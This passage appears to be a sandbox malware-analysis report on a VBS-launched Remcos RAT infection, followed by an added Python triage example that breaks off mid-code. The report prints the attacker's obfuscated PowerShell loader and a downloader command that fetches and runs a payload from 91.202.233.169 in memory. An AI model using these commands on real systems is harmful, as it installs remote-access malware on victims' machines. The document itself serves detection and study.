                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00426254
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00431377
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0043651C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0041E5DF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0044C739
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_004367C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_004267CB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0043C9DD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00432A49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00436A8D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0043CC0C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00436D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00434D22
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00426E73
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00440E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0043CE3B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00412F45
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00452F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00426FAD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function 00401F66 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function 004020E7 appears 40 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function 004338A5 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function 00433FB0 appears 55 times
                  Source: sostener.vbs | Initial sample: Strings found which are bigger than 50
                  Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 2984
                  Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                  Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 5896, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.powershell.exe.25f10962108.1.raw.unpack, h.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 7.2.powershell.exe.25f10962108.1.raw.unpack, au.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 7.2.powershell.exe.25f28c70000.4.raw.unpack, h.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 7.2.powershell.exe.25f28c70000.4.raw.unpack, au.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 7.2.powershell.exe.25f287f0000.3.raw.unpack, h.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 7.2.powershell.exe.25f287f0000.3.raw.unpack, au.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, h.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, au.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winVBS@14/11@5/6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00416AB7 GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, GetLastError
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0040E219 GetModuleFileNameW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CloseHandle, CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_0041A63F FindResourceA, LoadResource, LockResource, SizeofResource
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 15_2_00419BC4 OpenSCManagerW, OpenServiceW, CloseServiceHandle, StartServiceW, CloseServiceHandle, CloseServiceHandle, CloseServiceHandle
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-0883UG
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huhpgnei.lkn.ps1
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                  Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: sostener.vbs | ReversingLabs: Detection: 21%
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?B
v?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
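The process creations above, as an added triage example that is not part of the Joe Sandbox report: the rules below run over process-creation telemetry and flag a script host spawning PowerShell, PowerShell command lines carrying the unpacking indicators seen here (-encodedCommand, FromBase64String, the .replace('?','A') and .replace('$$','A') alphabet restoration, AppDomain.Load of a byte array, Invoke-WebRequest to a file), the loopback ping used as a delay, and PowerShell spawning AddInProcess32.exe, a .NET add-in host that has no business being a child of a script-launched PowerShell. SAMPLE_EVENTS is constructed to mirror the chain, with the long command lines shortened with '...'; the pids, the explorer.exe root, the benign inventory.ps1 event and the DOTNET_HOSTS list are this example's own assumptions.

```python
"""Triage of process-creation events for the wscript -> powershell -> AddInProcess32 chain.
Added example, not from the sandbox report; SAMPLE_EVENTS is constructed to mirror the
report's process creations (command lines shortened with '...'), pids are assumptions."""
import re
from dataclasses import dataclass

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


@dataclass(frozen=True)
class ProcEvent:  # Sysmon event 1 / 4688-style fields
    pid: int
    ppid: int
    image: str
    cmdline: str


SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1100, 1000, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\sostener.vbs"'),
    ProcEvent(1200, 1100, PS,
              "powershell.exe $IuJUJJZz = 'WwBT?Hk?cwB0...';$Yolopolhggobek = [system.Text.Encoding]"
              "::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) )"
              ";powershell $Yolopolhggobek"),
    ProcEvent(1300, 1200, PS,
              'powershell.exe "...;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;'
              "cmd.exe /c ;ping 127.0.0.1 ;...;[Byte[]] $mqons = [system.Convert]::FromBase64String("
              " ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain"
              '.Load($mqons)...;"'),
    ProcEvent(1400, 1300, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\system32\cmd.exe" /c'),
    ProcEvent(1500, 1300, r"C:\Windows\System32\PING.EXE", r'"C:\Windows\system32\PING.EXE" 127.0.0.1'),
    ProcEvent(1600, 1300, PS,
              "powershell.exe -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBT... -inputFormat xml"),
    ProcEvent(1700, 1300, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"'),
    ProcEvent(1800, 1000, PS, r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"),  # benign
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
DOTNET_HOSTS = {"addinprocess32.exe", "addinprocess.exe"}  # example's list; report shows the 32-bit one

CMDLINE_INDICATORS = [
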